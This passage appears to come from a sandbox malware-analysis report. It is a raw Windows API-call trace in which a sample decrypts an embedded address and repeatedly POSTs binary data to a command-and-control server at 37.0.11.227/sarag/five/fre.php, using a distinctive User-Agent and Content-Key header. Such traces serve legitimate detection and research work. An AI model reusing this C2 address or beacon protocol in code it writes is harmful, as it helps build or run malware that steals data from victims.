lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0195.826] GetProcessHeap () returned 0x690000 [0195.826] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0195.826] GetProcessHeap () returned 0x690000 [0195.827] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f48 | out: hHeap=0x690000) returned 1 [0195.827] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1190) returned 0x3dc [0195.828] Sleep (dwMilliseconds=0xea60) [0195.830] GetProcessHeap () returned 0x690000 [0195.830] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0195.830] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0195.831] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0195.836] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0195.836] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af078) returned 1 [0195.841] GetProcessHeap () returned 0x690000 [0195.842] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0195.842] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0195.842] CryptImportKey (in: hProv=0x6af078, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0195.843] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0195.844] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0195.844] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0195.844] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0195.844] GetProcessHeap () returned 0x690000 [0195.845] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0195.845] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0195.846] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0195.847] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0195.847] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0195.848] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0195.848] CryptReleaseContext (hProv=0x6af078, dwFlags=0x0) returned 1 [0195.848] GetProcessHeap () returned 0x690000 [0195.848] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6abd08 [0195.849] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0195.849] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0195.849] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0195.850] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0195.850] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0195.851] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0195.851] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0195.852] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0195.852] GetProcessHeap () returned 0x690000 [0195.852] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0195.852] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0195.852] GetProcessHeap () returned 0x690000 [0195.852] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0195.853] GetProcessHeap () returned 0x690000 [0195.853] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0195.853] GetProcessHeap () returned 0x690000 [0195.853] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0195.853] GetProcessHeap () returned 0x690000 [0195.853] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0195.854] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0195.854] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0195.859] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0195.859] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aeee0) returned 1 [0195.865] GetProcessHeap () returned 0x690000 [0195.865] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a30 [0195.866] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0195.866] CryptImportKey (in: hProv=0x6aeee0, pbData=0x6a8a30, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0195.866] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0195.867] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0195.867] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0195.868] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0195.868] GetProcessHeap () returned 0x690000 [0195.868] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a30 | out: hHeap=0x690000) returned 1 [0195.869] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0195.869] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0195.870] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0195.870] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0195.871] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0195.872] CryptReleaseContext (hProv=0x6aeee0, dwFlags=0x0) returned 1 [0195.872] GetProcessHeap () returned 0x690000 [0195.872] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6abd08 [0195.872] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0195.873] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0195.873] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0195.874] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0195.875] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0195.875] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0195.876] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0195.876] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0195.876] GetProcessHeap () returned 0x690000 [0195.876] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0195.876] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a9910*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6ae8c8*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0195.876] GetProcessHeap () returned 0x690000 [0195.876] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab3f0 [0195.876] socket (af=2, type=1, protocol=6) returned 0x3e0 [0195.877] connect (s=0x3e0, name=0x6ae8c8*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0195.899] FreeAddrInfoW (pAddrInfo=0x6a9910*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6ae8c8*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0195.899] GetProcessHeap () returned 0x690000 [0195.899] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6af100 [0195.899] GetProcessHeap () returned 0x690000 [0195.899] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b2fb8 [0195.900] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0195.901] wvsprintfA (in: param_1=0x6b2fb8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0195.901] GetProcessHeap () returned 0x690000 [0195.901] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afc80 [0195.901] GetProcessHeap () returned 0x690000 [0195.902] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 [0195.902] GetProcessHeap () returned 0x690000 [0195.902] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0195.902] GetProcessHeap () returned 0x690000 [0195.902] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b2fb8 [0195.903] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0195.904] wvsprintfA (in: param_1=0x6b2fb8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0195.904] GetProcessHeap () returned 0x690000 [0195.904] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6a91a8 [0195.904] GetProcessHeap () returned 0x690000 [0195.904] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 [0195.904] send (s=0x3e0, buf=0x6a91a8*, len=242, flags=0) returned 242 [0195.905] send (s=0x3e0, buf=0x6aba40*, len=159, flags=0) returned 159 [0195.905] GetProcessHeap () returned 0x690000 [0195.905] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0195.905] recv (in: s=0x3e0, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0195.972] GetProcessHeap () returned 0x690000 [0195.972] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a91a8 | out: hHeap=0x690000) returned 1 [0195.973] GetProcessHeap () returned 0x690000 [0195.973] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0195.973] GetProcessHeap () returned 0x690000 [0195.974] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afc80 | out: hHeap=0x690000) returned 1 [0195.974] GetProcessHeap () returned 0x690000 [0195.974] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af100 | out: hHeap=0x690000) returned 1 [0195.974] closesocket (s=0x3e0) returned 0 [0195.975] GetProcessHeap () returned 0x690000 [0195.975] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab3f0 | out: hHeap=0x690000) returned 1 [0195.975] GetProcessHeap () returned 0x690000 [0195.975] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0195.975] GetProcessHeap () returned 0x690000 [0195.975] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0195.976] GetProcessHeap () returned 0x690000 [0195.976] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0195.976] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x11a4) returned 0x3e0 [0195.978] Sleep (dwMilliseconds=0xea60) [0195.980] GetProcessHeap () returned 0x690000 [0195.980] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0195.981] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0195.981] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0195.991] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0195.992] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af188) returned 1 [0196.002] GetProcessHeap () returned 0x690000 [0196.002] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8970 [0196.003] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0196.003] CryptImportKey (in: hProv=0x6af188, pbData=0x6a8970, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0196.004] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0196.004] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0196.005] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0196.006] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0196.006] GetProcessHeap () returned 0x690000 [0196.006] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8970 | out: hHeap=0x690000) returned 1 [0196.007] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0196.007] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0196.008] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0196.008] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0196.012] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0196.012] CryptReleaseContext (hProv=0x6af188, dwFlags=0x0) returned 1 [0196.012] GetProcessHeap () returned 0x690000 [0196.012] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0196.013] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0196.013] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0196.014] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0196.014] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0196.019] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0196.020] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0196.021] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0196.021] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0196.021] GetProcessHeap () returned 0x690000 [0196.021] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0196.021] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0196.022] GetProcessHeap () returned 0x690000 [0196.022] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0196.022] GetProcessHeap () returned 0x690000 [0196.023] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0196.023] GetProcessHeap () returned 0x690000 [0196.023] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0196.023] GetProcessHeap () returned 0x690000 [0196.023] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0196.024] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0196.024] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0196.030] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0196.030] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0196.040] GetProcessHeap () returned 0x690000 [0196.040] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0196.041] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0196.041] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0196.045] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0196.045] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0196.046] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0196.046] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0196.046] GetProcessHeap () returned 0x690000 [0196.047] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0196.047] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0196.048] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0196.049] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0196.049] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0196.050] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0196.050] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0196.050] GetProcessHeap () returned 0x690000 [0196.050] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0196.051] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0196.051] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0196.052] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0196.053] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0196.053] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0196.054] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0196.055] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0196.055] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0196.055] GetProcessHeap () returned 0x690000 [0196.055] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0196.055] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a9ed8*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeac0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0196.055] GetProcessHeap () returned 0x690000 [0196.055] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab3d0 [0196.055] socket (af=2, type=1, protocol=6) returned 0x3e4 [0196.056] connect (s=0x3e4, name=0x6aeac0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0196.081] FreeAddrInfoW (pAddrInfo=0x6a9ed8*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeac0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0196.081] GetProcessHeap () returned 0x690000 [0196.081] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0196.081] GetProcessHeap () returned 0x690000 [0196.081] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b2fb8 [0196.082] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0196.083] wvsprintfA (in: param_1=0x6b2fb8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0196.083] GetProcessHeap () returned 0x690000 [0196.083] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afa40 [0196.083] GetProcessHeap () returned 0x690000 [0196.084] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 [0196.084] GetProcessHeap () returned 0x690000 [0196.084] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4340 [0196.084] GetProcessHeap () returned 0x690000 [0196.084] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b2fb8 [0196.085] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0196.088] wvsprintfA (in: param_1=0x6b2fb8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0196.088] GetProcessHeap () returned 0x690000 [0196.088] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6abd08 [0196.088] GetProcessHeap () returned 0x690000 [0196.089] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 [0196.089] send (s=0x3e4, buf=0x6abd08*, len=242, flags=0) returned 242 [0196.089] send (s=0x3e4, buf=0x6aba40*, len=159, flags=0) returned 159 [0196.090] GetProcessHeap () returned 0x690000 [0196.090] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0196.090] recv (in: s=0x3e4, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0196.172] GetProcessHeap () returned 0x690000 [0196.172] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0196.173] GetProcessHeap () returned 0x690000 [0196.173] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0196.173] GetProcessHeap () returned 0x690000 [0196.174] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afa40 | out: hHeap=0x690000) returned 1 [0196.174] GetProcessHeap () returned 0x690000 [0196.174] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0196.174] closesocket (s=0x3e4) returned 0 [0196.174] GetProcessHeap () returned 0x690000 [0196.174] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab3d0 | out: hHeap=0x690000) returned 1 [0196.175] GetProcessHeap () returned 0x690000 [0196.175] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0196.175] GetProcessHeap () returned 0x690000 [0196.175] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0196.175] GetProcessHeap () returned 0x690000 [0196.175] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0196.176] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x11a8) returned 0x3e4 [0196.177] Sleep (dwMilliseconds=0xea60) [0196.179] GetProcessHeap () returned 0x690000 [0196.179] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0196.180] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0196.180] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0196.190] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0196.190] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: 